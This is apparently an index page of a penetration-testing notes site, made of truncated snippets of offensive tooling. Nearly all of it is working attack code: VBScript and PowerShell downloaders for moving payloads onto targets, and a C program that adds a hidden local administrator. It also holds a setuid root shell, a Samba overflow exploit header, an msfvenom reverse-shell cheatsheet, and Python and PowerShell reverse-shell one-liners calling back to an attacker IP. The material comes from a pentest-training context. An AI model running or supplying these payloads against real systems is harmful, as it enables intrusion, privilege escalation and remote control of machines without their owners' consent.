Latest notes for PenTesting - MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-27 11:50:14

Recently (at the end of 2017), OWASP updated its Top 10 list. For the unfamiliar, let me briefly explain what that means: the industry standard for basic web-security education has changed. Though it has never been a complete security education, the OWASP Top Ten is where almost all standards for web-developer security education begin. So when it ch...


Score: 0


echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTI...


Score: 0


Usage: cscript wget.vbs http://[URL (including file)] [filename to save to]

On the attacker machine:
Copy the file to transfer to: **/var/www**
Start Apache: **service apache2 start**



echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT...


Score: 0


Usage: echo "" | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Make sure to change the values for $url and $file before sending the commands.

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[---URL (with filepath)-...


Score: 0


#include <stdlib.h>
int main()
{
int i;
int j;
i = system("net user [---username---] [---password---] /add");
j = system("net localgroup administrators [---username---] /add");
return 0;
}
...


Score: 0


/*source: http://www.securityfocus.com/bid/7294/info

A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.

Successful expl...


Score: 0


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
setgid(0);
system( "/bin/sh -i" );
}
...


Score: 0


## Reverse Shell with Msfvenom - Cheatsheet

### List payloads

```
msfvenom -l
```

Or

```
msfvenom --list payloads
```

### Generate a PHP payload

```
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
```

### Generate a Windows payload

##### ...


Score: 0


# Reverse shell one-liner python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
...


Score: 0


$client = New-Object System.Net.Sockets.TCPClient("192.168.30.165",4444);
$stream = $client.GetStream();

$greeting = "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($greeting);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();
[byte[]]$bytes = 0..255|%{0};


while(($i = ...


Score: 0